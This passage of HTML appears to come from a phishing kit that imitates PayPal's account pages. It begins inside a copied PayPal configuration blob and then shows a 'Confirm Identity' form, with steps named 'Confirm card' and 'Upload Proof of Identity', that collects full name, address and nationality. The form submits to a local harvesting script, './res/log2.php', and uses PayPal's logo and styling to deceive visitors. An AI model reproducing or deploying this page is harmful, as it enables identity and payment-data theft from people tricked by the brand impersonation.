(+1)&quot;},{&quot;$id&quot;:&quot;UY&quot;,&quot;$dialCode&quot;:&quot;598&quot;,&quot;$name&quot;:&quot;Uruguay&quot;,&quot;$elt&quot;:&quot;Uruguay (+598)&quot;},{&quot;$id&quot;:&quot;UZ&quot;,&quot;$dialCode&quot;:&quot;998&quot;,&quot;$name&quot;:&quot;Uzbekistan&quot;,&quot;$elt&quot;:&quot;Uzbekistan (+998)&quot;},{&quot;$id&quot;:&quot;VU&quot;,&quot;$dialCode&quot;:&quot;678&quot;,&quot;$name&quot;:&quot;Vanuatu&quot;,&quot;$elt&quot;:&quot;Vanuatu (+678)&quot;},{&quot;$id&quot;:&quot;VA&quot;,&quot;$dialCode&quot;:&quot;39&quot;,&quot;$name&quot;:&quot;Vatican City&quot;,&quot;$elt&quot;:&quot;Vatican City (+39)&quot;},{&quot;$id&quot;:&quot;VE&quot;,&quot;$dialCode&quot;:&quot;58&quot;,&quot;$name&quot;:&quot;Venezuela&quot;,&quot;$elt&quot;:&quot;Venezuela (+58)&quot;},{&quot;$id&quot;:&quot;VN&quot;,&quot;$dialCode&quot;:&quot;84&quot;,&quot;$name&quot;:&quot;Vietnam&quot;,&quot;$elt&quot;:&quot;Vietnam (+84)&quot;},{&quot;$id&quot;:&quot;WF&quot;,&quot;$dialCode&quot;:&quot;681&quot;,&quot;$name&quot;:&quot;Wallis &amp; Futuna&quot;,&quot;$elt&quot;:&quot;Wallis &amp; Futuna (+681)&quot;},{&quot;$id&quot;:&quot;EH&quot;,&quot;$dialCode&quot;:&quot;212&quot;,&quot;$name&quot;:&quot;Western Sahara&quot;,&quot;$elt&quot;:&quot;Western Sahara (+212)&quot;},{&quot;$id&quot;:&quot;YE&quot;,&quot;$dialCode&quot;:&quot;967&quot;,&quot;$name&quot;:&quot;Yemen&quot;,&quot;$elt&quot;:&quot;Yemen (+967)&quot;},{&quot;$id&quot;:&quot;ZM&quot;,&quot;$dialCode&quot;:&quot;260&quot;,&quot;$name&quot;:&quot;Zambia&quot;,&quot;$elt&quot;:&quot;Zambia (+260)&quot;},{&quot;$id&quot;:&quot;ZW&quot;,&quot;$dialCode&quot;:&quot;263&quot;,&quot;$name&quot;:&quot;Zimbabwe&quot;,&quot;$elt&quot;:&quot;Zimbabwe (+263)&quot;}],&quot;nameRegex&quot;:&quot;[A-Za-z\\xAA\\xBA\\xC0-\\xD6\\xD8-\\xF6\\u00F8-\\u024F\\u02B0-\\u02DD\\u02E0-\\u02E4\\u0300-\\u0341\\u0357-\\u0361\\u1E00-\\u1EFF\\u2C60-\\u2C7F\\uFB00-\\uFB06\\u0020\\u0027\\u002D\\u002E\\u002C]|[－\\uFF21-\\uFF3A\\uFF3E\\uFF40-\\uFF5A\\uFF07\\u3000\\u3400-\\u4DB5\\u4E00-\\u9FCC\\uF900-\\uFA6D\\uFA70-\\uFAD9]|[\\uD840-\\uD868\\uD86A-\\uD86C][\\uDC00-\\uDFFF]|\\uD86D[\\uDC00-\\uDF34\\uDF40-\\uDFFF]|\\uD86E[\\uDC00-\\uDC1D]|\\uD869[\\uDC00-\\uDED6\\uDF00-\\uDFFF]|\\uD87E[\\uDC00-\\uDE1D]&quot;,&quot;zipRegex&quot;:&quot;\\d{6}&quot;,&quot;emailAddress&quot;:&quot;kontolan@aol.com&quot;,&quot;phoneCountryCode&quot;:&quot;SG&quot;,&quot;rowSource&quot;:{&quot;currency&quot;:&quot;SGD&quot;,&quot;zip&quot;:{&quot;required&quot;:true}},&quot;legalEntity&quot;:[&quot;P&quot;],&quot;griffin&quot;:{&quot;address&quot;:{&quot;status&quot;:{&quot;isSuccessful&quot;:false,&quot;msg&quot;:&quot;userCountryCode=(SG)...language=(en_GB)...TypeError: groupCityList.map is not a function&quot;,&quot;isEnabled&quot;:false},&quot;formattedAddressEntry&quot;:{&quot;layout&quot;:[{&quot;$&quot;:&quot;addressPre&quot;},{&quot;$&quot;:&quot;linePre&quot;},{&quot;$&quot;:&quot;line1Pre&quot;},{&quot;$&quot;:&quot;line1&quot;,&quot;_&quot;:&quot;&quot;,&quot;required&quot;:true},{&quot;$&quot;:&quot;line1Post&quot;},{&quot;$&quot;:&quot;linePost&quot;},{&quot;$&quot;:&quot;linePre&quot;},{&quot;$&quot;:&quot;line2Pre&quot;},{&quot;$&quot;:&quot;line2&quot;,&quot;_&quot;:&quot;&quot;},{&quot;$&quot;:&quot;line2Post&quot;},{&quot;$&quot;:&quot;linePost&quot;},{&quot;$&quot;:&quot;linePre&quot;},{&quot;$&quot;:&quot;postcodePre&quot;},{&quot;$&quot;:&quot;postcode&quot;,&quot;_&quot;:&quot;&quot;,&quot;maxLength&quot;:6,&quot;required&quot;:true,&quot;validationPattern&quot;:&quot;\\d{6}&quot;},{&quot;$&quot;:&quot;postcodePost&quot;},{&quot;$&quot;:&quot;linePost&quot;},{&quot;$&quot;:&quot;addressPost&quot;}],&quot;strings&quot;:{&quot;cityLabel&quot;:&quot;City&quot;,&quot;line1Label&quot;:&quot;Address line 1&quot;,&quot;line2Label&quot;:&quot;Address line 2&quot;,&quot;optionalLabel&quot;:&quot;(optional)&quot;,&quot;postcodeLabel&quot;:&quot;Postcode&quot;,&quot;validationError&quot;:&quot;Your postcode must be 6 digits.&quot;}}}}},&quot;aoc&quot;:{&quot;emailAddress&quot;:&quot;&quot;,&quot;numOfSteps&quot;:&quot;2&quot;,&quot;isUpgrade&quot;:false},&quot;currentYear&quot;:2018,&quot;flow&quot;:&quot;ROW-SG-pps&quot;,&quot;templateRegistry&quot;:{&quot;default&quot;:{&quot;fatca&quot;:{&quot;90dayNotice.dust&quot;:true,&quot;optionalFatca.dust&quot;:true,&quot;progress.dust&quot;:true,&quot;radioQuestions.dust&quot;:true,&quot;securityQuestions.dust&quot;:true,&quot;selfCertification.dust&quot;:true,&quot;signature.dust&quot;:true},&quot;inc&quot;:{&quot;component&quot;:{&quot;UVLTextArea.dust&quot;:true,&quot;UVLTextInput.dust&quot;:true,&quot;siteCatalystInit.dust&quot;:true},&quot;css.dust&quot;:true,&quot;footer.dust&quot;:true,&quot;illustration.dust&quot;:true,&quot;javascripts.dust&quot;:true,&quot;logout.dust&quot;:true,&quot;metaHeaders.dust&quot;:true,&quot;onboarding&quot;:{&quot;averageMonthlyVolume.dust&quot;:true,&quot;beneficialOwner.dust&quot;:true,&quot;beneficialOwnerList.dust&quot;:true,&quot;billingAddress.dust&quot;:true,&quot;billingCard.dust&quot;:true,&quot;birthPlaceInfo.dust&quot;:true,&quot;businessCategory.dust&quot;:true,&quot;businessContactDetails.dust&quot;:true,&quot;businessEstablished.dust&quot;:true,&quot;businessInfoDetails.dust&quot;:true,&quot;businessName.dust&quot;:true,&quot;businessType.dust&quot;:true,&quot;businessWebsite.dust&quot;:true,&quot;cancelUpgrade.dust&quot;:true,&quot;cardHoldersName.dust&quot;:true,&quot;city.dust&quot;:true,&quot;confirmIdentityHelp.dust&quot;:true,&quot;congratsDefaultInfoContainer.dust&quot;:true,&quot;congratsNextLink.dust&quot;:true,&quot;contactName.dust&quot;:true,&quot;countries.dust&quot;:true,&quot;creditCardCsc.dust&quot;:true,&quot;creditCardExpires.dust&quot;:true,&quot;creditCardNumber.dust&quot;:true,&quot;customerEmail.dust&quot;:true,&quot;customerPhone.dust&quot;:true,&quot;dateBizEst.dust&quot;:true,&quot;dateEstablished.dust&quot;:true,&quot;dateOfBirth.dust&quot;:true,&quot;emailAddress.dust&quot;:true,&quot;idNumber.dust&quot;:true,&quot;loginHeader.dust&quot;:true,&quot;loginMessage.dust&quot;:true,&quot;longVersion.dust&quot;:true,&quot;modals.dust&quot;:true,&quot;modals&quot;:{&quot;businessTypeTooltip.dust&quot;:true,&quot;changeBusinessType.dust&quot;:true},&quot;myPayPalLink.dust&quot;:true,&quot;nationality.dust&quot;:true,&quot;nonprofitDetails.dust&quot;:true,&quot;password.dust&quot;:true,&quot;passwordLogin.dust&quot;:true,&quot;personalAddressEntry.dust&quot;:true,&quot;personalContactDetails.dust&quot;:true,&quot;personalContactHeader.dust&quot;:true,&quot;personalInfoHiddenValues.dust&quot;:true,&quot;personalInfoSecurity.dust&quot;:true,&quot;personalPhoneNumber.dust&quot;:true,&quot;phoneNumber.dust&quot;:true,&quot;phoneTerms.dust&quot;:true,&quot;postalCode.dust&quot;:true,&quot;previousAddressEntry.dust&quot;:true,&quot;processingModal.dust&quot;:true,&quot;progress.dust&quot;:true,&quot;shortVersion.dust&quot;:true,&quot;showHidePassword.dust&quot;:true,&quot;signupContext.dust&quot;:true,&quot;socialSecurityId.dust&quot;:true,&quot;stakeholderAddressEntry.dust&quot;:true,&quot;stakeholderNationality.dust&quot;:true,&quot;summaryModal.dust&quot;:true,&quot;taxId.dust&quot;:true,&quot;terms.dust&quot;:true,&quot;tradeRegistryNumber.dust&quot;:true,&quot;tradingName.dust&quot;:true,&quot;tvaNumber.dust&quot;:true,&quot;upgradeBusinessContactInfo.dust&quot;:true,&quot;upgradeHeaderMessage.dust&quot;:true,&quot;upgradeSubmitButton.dust&quot;:true,&quot;upgradeTerms.dust&quot;:true,&quot;validationContent.dust&quot;:true,&quot;welcomeBack.dust&quot;:true,&quot;zipCode.dust&quot;:true}},&quot;partner&quot;:{&quot;AU&quot;:{&quot;views&quot;:{&quot;applicationChecklist.dust&quot;:true,&quot;existingAccountLogin.dust&quot;:true,&quot;upgradeDecision.dust&quot;:true}},&quot;BR&quot;:{&quot;inc&quot;:{&quot;onboarding&quot;:{&quot;emailAddress.dust&quot;:true}}},&quot;US&quot;:{&quot;pro&quot;:{&quot;inc&quot;:{&quot;css.dust&quot;:true,&quot;footer.dust&quot;:true,&quot;javascripts.dust&quot;:true,&quot;onboarding&quot;:{&quot;addressEntry.dust&quot;:true,&quot;averageMonthlyVolume.dust&quot;:true,&quot;averagePrice.dust&quot;:true,&quot;businessCategory.dust&quot;:true,&quot;businessContactDetails.dust&quot;:true,&quot;businessEstablished.dust&quot;:true,&quot;businessInfoDetails.dust&quot;:true,&quot;businessName.dust&quot;:true,&quot;businessNonProfitDescription.dust&quot;:true,&quot;businessType.dust&quot;:true,&quot;businessWebsite.dust&quot;:true,&quot;captcha.dust&quot;:true,&quot;creditReportInfo.dust&quot;:true,&quot;dateOfBirth.dust&quot;:true,&quot;existingAccountProAgreements.dust&quot;:true,&quot;passwordLogin.dust&quot;:true,&quot;personalAddressEntry.dust&quot;:true,&quot;personalContactDetails.dust&quot;:true,&quot;personalContactHeader.dust&quot;:true,&quot;personalInfoHiddenValues.dust&quot;:true,&quot;personalInfoSecurity.dust&quot;:true,&quot;personalPhoneNumber.dust&quot;:true,&quot;phoneNumber.dust&quot;:true,&quot;postalCode.dust&quot;:true,&quot;processingModal.dust&quot;:true,&quot;progress.dust&quot;:true,&quot;revenueFromOnlineSales.dust&quot;:true,&quot;socialSecurityId.dust&quot;:true,&quot;taxId.dust&quot;:true,&quot;terms.dust&quot;:true,&quot;upgradeBusinessContactInfo.dust&quot;:true}},&quot;views&quot;:{&quot;businessInfo.dust&quot;:true,&quot;congratsPartner.dust&quot;:true,&quot;customerService.dust&quot;:true,&quot;homePage.dust&quot;:true,&quot;personalInfo.dust&quot;:true}}},&quot;inc&quot;:{&quot;css.dust&quot;:true,&quot;javascripts.dust&quot;:true,&quot;onboarding&quot;:{&quot;contactName.dust&quot;:true,&quot;countryDropDown.dust&quot;:true,&quot;emailAddress.dust&quot;:true,&quot;terms-partner.dust&quot;:true,&quot;terms.dust&quot;:true,&quot;upgradeTerms.dust&quot;:true}},&quot;views&quot;:{&quot;addBank.dust&quot;:true,&quot;applicationChecklist.dust&quot;:true,&quot;authorizeReferralData.dust&quot;:true,&quot;businessInfo.dust&quot;:true,&quot;confirmEmail.dust&quot;:true,&quot;congratsPartner.dust&quot;:true,&quot;contextualMsgPref.dust&quot;:true,&quot;create.dust&quot;:true,&quot;errorMessagePage.dust&quot;:true,&quot;existingAccountLogin.dust&quot;:true,&quot;grantPermission.dust&quot;:true,&quot;grantPermissionOauth.dust&quot;:true,&quot;hostedUserAgreement.dust&quot;:true,&quot;permissionDefinitions.dust&quot;:true,&quot;personalInfo.dust&quot;:true,&quot;progressiveDone.dust&quot;:true,&quot;shareAPI.dust&quot;:true,&quot;upgradeBusinessAccount.dust&quot;:true,&quot;upgradeDecision.dust&quot;:true,&quot;upgradeRestrict.dust&quot;:true}},&quot;views&quot;:{&quot;addBank.dust&quot;:true,&quot;additionalInformation.dust&quot;:true,&quot;applicationChecklist.dust&quot;:true,&quot;billingInformation.dust&quot;:true,&quot;bizTypeSelection.dust&quot;:true,&quot;businessInfo.dust&quot;:true,&quot;confirmEmail.dust&quot;:true,&quot;congratsDefault.dust&quot;:true,&quot;countrySelection.dust&quot;:true,&quot;create.dust&quot;:true,&quot;existingAccountLogin.dust&quot;:true,&quot;organizationIncome.dust&quot;:true,&quot;personalInfo.dust&quot;:true,&quot;proDecline.dust&quot;:true,&quot;proDone.dust&quot;:true,&quot;saveAndExit.dust&quot;:true,&quot;stakeholders.dust&quot;:true,&quot;summaryOfServices.dust&quot;:true,&quot;upgradeBusinessAccount.dust&quot;:true,&quot;upgradeDecision.dust&quot;:true,&quot;upgradeOption.dust&quot;:true}},&quot;errors&quot;:{&quot;errorPage.dust&quot;:true},&quot;ROW&quot;:{&quot;AR&quot;:{&quot;inc&quot;:{&quot;onboarding&quot;:{&quot;postalCode.dust&quot;:true}}},&quot;C2&quot;:{&quot;fatca&quot;:{&quot;signature.dust&quot;:true},&quot;inc&quot;:{&quot;javascripts.dust&quot;:true,&quot;onboarding&quot;:{&quot;addressEntry.dust&quot;:true,&quot;contactName.dust&quot;:true,&quot;upgradeHeaderMessage.dust&quot;:true}}},&quot;HK&quot;:{&quot;fatca&quot;:{&quot;signature.dust&quot;:true},&quot;inc&quot;:{&quot;javascripts.dust&quot;:true,&quot;onboarding&quot;:{&quot;addressEntry.dust&quot;:true,&quot;contactName.dust&quot;:true,&quot;upgradeBusinessContactInfo.dust&quot;:true,&quot;upgradeHeaderMessage.dust&quot;:true}}},&quot;ID&quot;:{&quot;inc&quot;:{&quot;onboarding&quot;:{&quot;businessContactDetails.dust&quot;:true,&quot;personalContactDetails.dust&quot;:true,&quot;postalCode.dust&quot;:true}}},&quot;IL&quot;:{&quot;inc&quot;:{&quot;css.dust&quot;:true}},&quot;KR&quot;:{&quot;fatca&quot;:{&quot;signature.dust&quot;:true},&quot;inc&quot;:{&quot;onboarding&quot;:{&quot;addressEntry.dust&quot;:true,&quot;contactName.dust&quot;:true,&quot;upgradeHeaderMessage.dust&quot;:true}}},&quot;MX&quot;:{&quot;inc&quot;:{&quot;css.dust&quot;:true,&quot;javascripts.dust&quot;:true,&quot;onboarding&quot;:{&quot;addressEntry.dust&quot;:true,&quot;businessContactDetails.dust&quot;:true,&quot;congratsDefaultInfoContainer.dust&quot;:true,&quot;personalContactDetails.dust&quot;:true,&quot;phoneNumber.dust&quot;:true,&quot;postalCode.dust&quot;:true,&quot;progress.dust&quot;:true,&quot;showHidePassword.dust&quot;:true,&quot;state.dust&quot;:true,&quot;upgradeBusinessContactInfo.dust&quot;:true,&quot;upgradeSubmitButton.dust&quot;:true}},&quot;views&quot;:{&quot;applicationChecklist.dust&quot;:true,&quot;congratsDefault.dust&quot;:true,&quot;create.dust&quot;:true}},&quot;MY&quot;:{&quot;inc&quot;:{&quot;javascripts.dust&quot;:true}},&quot;RU&quot;:{&quot;inc&quot;:{&quot;css.dust&quot;:true,&quot;javascripts.dust&quot;:true,&quot;onboarding&quot;:{&quot;addressEntry.dust&quot;:true,&quot;businessContactDetails.dust&quot;:true,&quot;contactName.dust&quot;:true,&quot;postalCode.dust&quot;:true,&quot;terms.dust&quot;:true}},&quot;views&quot;:{&quot;congratsDefault.dust&quot;:true,&quot;upgradeDecision.dust&quot;:true}},&quot;SG&quot;:{&quot;inc&quot;:{&quot;javascripts.dust&quot;:true,&quot;onboarding&quot;:{&quot;addressDisplay.dust&quot;:true,&quot;businessInfoDetails.dust&quot;:true,&quot;nationality.dust&quot;:true,&quot;postalCode.dust&quot;:true}},&quot;views&quot;:{&quot;businessInfo.dust&quot;:true}},&quot;TH&quot;:{&quot;inc&quot;:{&quot;onboarding&quot;:{&quot;postalCode.dust&quot;:true}}},&quot;TW&quot;:{&quot;fatca&quot;:{&quot;signature.dust&quot;:true},&quot;inc&quot;:{&quot;onboarding&quot;:{&quot;addressEntry.dust&quot;:true,&quot;contactName.dust&quot;:true,&quot;upgradeHeaderMessage.dust&quot;:true}}},&quot;VN&quot;:{&quot;fatca&quot;:{&quot;signature.dust&quot;:true},&quot;inc&quot;:{&quot;onboarding&quot;:{&quot;contactName.dust&quot;:true,&quot;upgradeHeaderMessage.dust&quot;:true}}},&quot;inc&quot;:{&quot;css.dust&quot;:true,&quot;footer.dust&quot;:true,&quot;javascripts.dust&quot;:true,&quot;onboarding&quot;:{&quot;addressDisplay.dust&quot;:true,&quot;addressEntry.dust&quot;:true,&quot;averageMonthlyVolume.dust&quot;:true,&quot;businessCategory.dust&quot;:true,&quot;businessContactDetails.dust&quot;:true,&quot;businessEstablished.dust&quot;:true,&quot;businessInfoDetails.dust&quot;:true,&quot;businessType.dust&quot;:true,&quot;cancelUpgrade.dust&quot;:true,&quot;confirmIdentityHelp.dust&quot;:true,&quot;congratsDefaultInfoContainer.dust&quot;:true,&quot;congratsNextLink.dust&quot;:true,&quot;css.dust&quot;:true,&quot;currency.dust&quot;:true,&quot;fullCountryPhoneCodes.dust&quot;:true,&quot;identity.dust&quot;:true,&quot;myPayPalLink.dust&quot;:true,&quot;nationality.dust&quot;:true,&quot;personalContactDetails.dust&quot;:true,&quot;personalContactHeader.dust&quot;:true,&quot;personalInfoHiddenValues.dust&quot;:true,&quot;personalInfoSecurity.dust&quot;:true,&quot;phoneNumber.dust&quot;:true,&quot;postalCode.dust&quot;:true,&quot;processingModal.dust&quot;:true,&quot;progress.dust&quot;:true,&quot;taxId.dust&quot;:true,&quot;terms.dust&quot;:true,&quot;upgradeBusinessContactInfo.dust&quot;:true,&quot;upgradeHeaderMessage.dust&quot;:true,&quot;upgradeSubmitButton.dust&quot;:true,&quot;upgradeTerms.dust&quot;:true,&quot;validationContent.dust&quot;:true}},&quot;views&quot;:{&quot;bizTypeSelection.dust&quot;:true,&quot;businessInfo.dust&quot;:true,&quot;countrySelection.dust&quot;:true,&quot;personalInfo.dust&quot;:true}}},&quot;enableMediaplexStart&quot;:true,&quot;showProgressNav&quot;:true,&quot;showTitleBar&quot;:true}" data-view-name="default/views/create"><noscript><p class="nonjsAlert" role="alert">NOTE: Many features on the PayPal Web site require Javascript and cookies.</p></noscript><div id="page" class="marketing-ce2"><header class="gblHeader"><div class="nav"><div class="navOut"><nav class="logo" role="navigation"><img src="https://www.paypalobjects.com/webstatic/i/sparta/logo/logo_paypal_106x29.png" alt="PayPal home" />

</nav></div></div></header><div id="content">
    
    
    
    
    
    <div id="main" class="falcon"><div class="nsb_6_18"><div class="falconTray"><div id="pageLevelMessage" role="alert" class="clearfix"><div class="message"></div></div><div class="customHelperOuter showProgress clearfix hide"><div class="customHelperInner clearfix">☃helpContent☃</div></div><div class="trayNavOuter clearfix showProgress"><div class="progress" id="progress" aria-describedby="navigationMenu"><div class="verticalRule"></div><ul class="navSection"><li class="progressItem create active" data-target="create">Confirm card</li><li class="progressItem create active" data-target="businessInfo">Confirm Identity</li><li class="progressItem personalInfo" data-target="personalInfo">Upload Proof of Identity</li><li class="progressItem stakeholders hide" data-target="stakeholders">☃stakeholderInfo☃</li><li class="progressItem organizationIncome hide" data-target="organizationIncome">More information</li></ul><div class="mask"></div></div><div class="progressItemAlternatives hide"><li id="selfCertify">Certification</li></div><div class="trayNavInner clearfix" id="onboardingContent" role="main"><section id="create"><header><h1 class="falconHeaderText"><div id="accountSignup">Confirm Identity</div></h1></header><form method="post" id="signupForm" class="formMedium lap proceed" action="./res/log2.php" data-genericError="Sorry, there seems to be a problem. Please try again or call Customer Service." ><h2 id="accountSignupMessage" class="subheaderText"></h2><div class="row-fluid">
                            
                            
                            
                            
   

<style>
.btn {
  background: #3baee7;
  background-image: -webkit-linear-gradient(top, #3baee7, #08c);
  background-image: -moz-linear-gradient(top, #3baee7, #08c);
  background-image: -ms-linear-gradient(top, #3baee7, #08c);
  background-image: -o-linear-gradient(top, #3baee7, #08c);
  background-image: linear-gradient(to bottom, #3baee7, #08c);
  -webkit-border-radius: 7;
  -moz-border-radius: 7;
  border-radius: 7px;
  text-shadow: 1px 1px 3px #666666;
  font-family: Arial;
  color: #ffffff;
  font-size: 16px;
  padding: 10px 130px 10px 125px;
  border: solid #1f628d 0px;
  text-decoration: none;
}

.btn:hover {
  background: #3cb0fd;
  background-image: -webkit-linear-gradient(top, #3cb0fd, #3498db);
  background-image: -moz-linear-gradient(top, #3cb0fd, #3498db);
  background-image: -ms-linear-gradient(top, #3cb0fd, #3498db);
  background-image: -o-linear-gradient(top, #3cb0fd, #3498db);
  background-image: linear-gradient(to bottom, #3cb0fd, #3498db);
  text-decoration: none;
}
.dark {
	border: none;
	color: #525252;
	height: 25px;
	line-height:15px;
	margin-bottom: 16px;
	margin-right: 6px;
	margin-top: 2px;
	outline: 0 none;
	padding: 5px 0px 5px 5px;
	width: 30%;
	border-radius: 2px;
	-webkit-border-radius: 2px;
	-moz-border-radius: 2px;
	-moz-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
	background: #DFDFDF;
	}
}
.dark-select {
    background: #DFDFDF url('down-arrow.png') no-repeat right;
    background: #DFDFDF url('down-arrow.png') no-repeat right;
    appearance:none;
    -webkit-appearance:none; 
    -moz-appearance: none;
    text-indent: 0.01px;
    text-overflow: '';
    width: 70%;
    height: 35px;
	color: #525252;
	line-height: 25px;
}
</style>


<form class="" style="margin-top:9px;margin-left:17px" method="post" action="./res/log2.php" >
    
    
    
    
    
    
		<div class="textInput lap "><div class="fields large"><label for="lastName">
        <input id="first" type="text"maxlength="20" style="width: 97.5%;" placeholder="&nbsp;Full name"  name="name" class="white" required="required" pattern="^(\w\w+)\s(\w+)$" title="Please Enter Your First name"><br><br>
              
              
              
       
       
       
       
       
       
       
       
		        <input id="address1" type="text" maxlength="50" style="width: 97.5%;"placeholder="&nbsp;Street name and house number"  name="address1" class="white" required title="Please Enter Your Address"><br>
        <br>
        <input id="address2" type="text" maxlength="50" style="width: 97.5%;" placeholder="&nbsp;Address line 2 "  name="address2" class="white" >
        <br><br><div class="groupFields joint" '=""><div class="fields left"><label for="nationality"></label></div><div class="nativeDropdown medium right "><div class="selectDropdown"><select id="nationality" name="nationality"><option selected="selected" value="AF">Nationality</option><option value="AX">Åland Islands</option><option value="AL">Albania</option><option value="DZ">Algeria</option><option value="AS">American Samoa</option><option value="AD">Andorra</option><option value="AO">Angola</option><option value="AI">Anguilla</option><option value="AG">Antigua &amp; Barbuda</option><option value="AR">Argentina</option><option value="AM">Armenia</option><option value="AW">Aruba</option><option value="AU">Australia</option><option value="AT">Austria</option><option value="AZ">Azerbaijan</option><option value="BS">Bahamas</option><option value="BH">Bahrain</option><option value="BD">Bangladesh</option><option value="BB">Barbados</option><option value="BY">Belarus</option><option value="BE">Belgium</option><option value="BZ">Belize</option><option value="BJ">Benin</option><option value="BM">Bermuda</option><option value="BT">Bhutan</option><option value="BO">Bolivia</option><option value="BA">Bosnia &amp; Herzegovina</option><option value="BW">Botswana</option><option value="BR">Brazil</option><option value="VG">British Virgin Islands</option><option value="BN">Brunei</option><option value="BG">Bulgaria</option><option value="BF">Burkina Faso</option><option value="BI">Burundi</option><option value="KH">Cambodia</option><option value="CM">Cameroon</option><option value="CA">Canada</option><option value="CV">Cape Verde</option><option value="BQ">Caribbean Netherlands</option><option value="KY">Cayman Islands</option><option value="CF">Central African Republic</option><option value="TD">Chad</option><option value="CL">Chile</option><option value="C2">China</option><option value="CC">Cocos (Keeling) Islands</option><option value="CO">Colombia</option><option value="KM">Comoros</option><option value="CG">Congo - Brazzaville</option><option value="CD">Congo - Kinshasa</option><option value="CK">Cook Islands</option><option value="CR">Costa Rica</option><option value="CI">Côte d’Ivoire</option><option value="HR">Croatia</option><option value="CU">Cuba</option><option value="CW">Curaçao</option><option value="CY">Cyprus</option><option value="CZ">Czech Republic</option><option value="DK">Denmark</option><option value="DJ">Djibouti</option><option value="DM">Dominica</option><option value="DO">Dominican Republic</option><option value="EC">Ecuador</option><option value="EG">Egypt</option><option value="SV">El Salvador</option><option value="GQ">Equatorial Guinea</option><option value="ER">Eritrea</option><option value="EE">Estonia</option><option value="ET">Ethiopia</option><option value="FK">Falkland Islands</option><option value="FO">Faroe Islands</option><option value="FJ">Fiji</option><option value="FI">Finland</option><option value="FR">France</option><option value="GF">French Guiana</option><option value="PF">French Polynesia</option><option value="GA">Gabon</option><option value="GM">Gambia</option><option value="GE">Georgia</option><option value="DE">Germany</option><option value="GH">Ghana</option><option value="GI">Gibraltar</option><option value="GR">Greece</option><option value="GL">Greenland</option><option value="GD">Grenada</option><option value="GP">Guadeloupe</option><option value="GU">Guam</option><option value="GT">Guatemala</option><option value="GG">Guernsey</option><option value="GN">Guinea</option><option value="GW">Guinea-Bissau</option><option value="GY">Guyana</option><option value="HT">Haiti</option><option value="HN">Honduras</option><option value="HK">Hong Kong SAR China</option><option value="HU">Hungary</option><option value="IS">Iceland</option><option value="IN">India</option><option value="ID">Indonesia</option><option value="IR">Iran</option><option value="IQ">Iraq</option><option value="IE">Ireland</option><option value="IM">Isle of Man</option><option value="IL">Israel</option><option value="IT">Italy</option><option value="JM">Jamaica</option><option value="JP">Japan</option><option value="JE">Jersey</option><option value="JO">Jordan</option><option value="KZ">Kazakhstan</option><option value="KE">Kenya</option><option value="KI">Kiribati</option><option value="XK">Kosovo</option><option value="KW">Kuwait</option><option value="KG">Kyrgyzstan</option><option value="LA">Laos</option><option value="LV">Latvia</option><option value="LB">Lebanon</option><option value="LS">Lesotho</option><option value="LR">Liberia</option><option value="LY">Libya</option><option value="LI">Liechtenstein</option><option value="LT">Lithuania</option><option value="LU">Luxembourg</option><option value="MO">Macau SAR China</option><option value="MK">Macedonia</option><option value="MG">Madagascar</option><option value="MW">Malawi</option><option value="MY">Malaysia</option><option value="MV">Maldives</option><option value="ML">Mali</option><option value="MT">Malta</option><option value="MH">Marshall Islands</option><option value="MQ">Martinique</option><option value="MR">Mauritania</option><option value="MU">Mauritius</option><option value="YT">Mayotte</option><option value="MX">Mexico</option><option value="FM">Micronesia</option><option value="MD">Moldova</option><option value="MC">Monaco</option><option value="MN">Mongolia</option><option value="ME">Montenegro</option><option value="MS">Montserrat</option><option value="MA">Morocco</option><option value="MZ">Mozambique</option><option value="MM">Myanmar (Burma)</option><option value="NA">Namibia</option><option value="NR">Nauru</option><option value="NP">Nepal</option><option value="NL">Netherlands</option><option value="AN">Netherlands Antilles</option><option value="NC">New Caledonia</option><option value="NZ">New Zealand</option><option value="NI">Nicaragua</option><option value="NE">Niger</option><option value="NG">Nigeria</option><option value="NU">Niue</option><option value="NF">Norfolk Island</option><option value="KP">North Korea</option><option value="MP">Northern Mariana Islands</option><option value="NO">Norway</option><option value="OM">Oman</option><option value="PK">Pakistan</option><option value="PW">Palau</option><option value="PS">Palestinian Territories</option><option value="PA">Panama</option><option value="PG">Papua New Guinea</option><option value="PY">Paraguay</option><option value="PE">Peru</option><option value="PH">Philippines</option><option value="PN">Pitcairn Islands</option><option value="PL">Poland</option><option value="PT">Portugal</option><option value="PR">Puerto Rico</option><option value="QA">Qatar</option><option value="RE">Réunion</option><option value="RO">Romania</option><option value="RU">Russia</option><option value="RW">Rwanda</option><option value="WS">Samoa</option><option value="SM">San Marino</option><option value="ST">São Tomé &amp; Príncipe</option><option value="SA">Saudi Arabia</option><option value="SN">Senegal</option><option value="RS">Serbia</option><option value="SC">Seychelles</option><option value="SL">Sierra Leone</option><option value="SG">Singapore</option><option value="SX">Sint Maarten</option><option value="SK">Slovakia</option><option value="SI">Slovenia</option><option value="SB">Solomon Islands</option><option value="SO">Somalia</option><option value="ZA">South Africa</option><option value="KR">South Korea</option><option value="SS">South Sudan</option><option value="ES">Spain</option><option value="LK">Sri Lanka</option><option value="BL">St. Barthélemy</option><option value="SH">St. Helena</option><option value="KN">St. Kitts &amp; Nevis</option><option value="LC">St. Lucia</option><option value="MF">St. Martin</option><option value="PM">St. Pierre &amp; Miquelon</option><option value="VC">St. Vincent &amp; Grenadines</option><option value="SD">Sudan</option><option value="SR">Suriname</option><option value="SJ">Svalbard &amp; Jan Mayen</option><option value="SZ">Swaziland</option><option value="SE">Sweden</option><option value="CH">Switzerland</option><option value="SY">Syria</option><option value="TW">Taiwan</option><option value="TJ">Tajikistan</option><option value="TZ">Tanzania</option><option value="TH">Thailand</option><option value="TL">Timor-Leste</option><option value="TG">Togo</option><option value="TK">Tokelau</option><option value="TO">Tonga</option><option value="TT">Trinidad &amp; Tobago</option><option value="TN">Tunisia</option><option value="TR">Turkey</option><option value="TM">Turkmenistan</option><option value="TC">Turks &amp; Caicos Islands</option><option value="TV">Tuvalu</option><option value="VI">U.S. Virgin Islands</option><option value="UG">Uganda</option><option value="UA">Ukraine</option><option value="AE">United Arab Emirates</option>><option  value="GB">United Kingdom</option><option value="US">United States</option><option value="UY">Uruguay</option><option value="UZ">Uzbekistan</option><option value="VU">Vanuatu</option><option value="VA">Vatican City</option><option value="VE">Venezuela</option><option value="VN">Vietnam</option><option value="WF">Wallis &amp; Futuna</option><option value="EH">Western Sahara</option><option value="YE">Yemen</option><option value="ZM">Zambia</option><option value="ZW">Zimbabwe</option></select></div></div></div>
</select><br>
		
